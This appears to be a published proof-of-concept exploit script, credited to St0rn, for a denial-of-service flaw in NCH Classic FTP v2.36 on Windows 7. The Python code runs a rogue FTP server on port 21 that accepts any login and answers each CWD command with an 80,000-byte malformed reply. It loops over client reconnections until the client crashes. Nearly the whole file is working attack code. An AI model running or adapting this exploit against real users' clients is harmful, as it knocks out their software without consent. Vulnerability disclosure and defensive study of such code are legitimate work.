48 lines
No EOL
1.1 KiB
Python
Executable file
48 lines
No EOL
1.1 KiB
Python
Executable file
#!/usr/bin/env python
|
|
#
|
|
# Exploit Title: Classic FTP v2.36 CWD Reconnection DOS
|
|
# Date: 27/07/2015
|
|
# Exploit Author: St0rn <fabien[at]anbu-pentest[dot]com>
|
|
# Vendor Homepage: www.nchsoftware.com
|
|
# Software Link: www.nchsoftware.com/classic/cftpsetup.exe
|
|
# Version: 2.36
|
|
# Tested on: Windows 7
|
|
#
|
|
|
|
|
|
import socket
|
|
import sys
|
|
import time
|
|
|
|
|
|
junk1="250 "+"a"*(80000-6)+"\r\n"
|
|
c=1
|
|
|
|
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.bind(("",21))
|
|
s.listen(10)
|
|
|
|
|
|
while 1:
|
|
conn, addr = s.accept()
|
|
print 'Connected with ' + addr[0] + ':' + str(addr[1])
|
|
conn.send("220 Classic FTP Xsploit\r\n")
|
|
try:
|
|
while 1:
|
|
buf=conn.recv(1024)
|
|
if "USER" in buf:
|
|
conn.send("331 User name okay, need password\r\n")
|
|
if "PASS" in buf:
|
|
conn.send("230-Password accepted.\r\n")
|
|
conn.send("230 User logged in.\r\n")
|
|
if "CWD" in buf:
|
|
conn.send(junk1)
|
|
print "Evil Response send with %s bytes!" %len(junk1)
|
|
print "Loop %s: \n\tWaiting client reconnection, crash in %s loop\n" %(c,(122-c))
|
|
if c==122:
|
|
print "BOOMmMm!"
|
|
c+=1
|
|
if "QUIT" in buf:
|
|
break
|
|
except:
|
|
time.sleep(0) |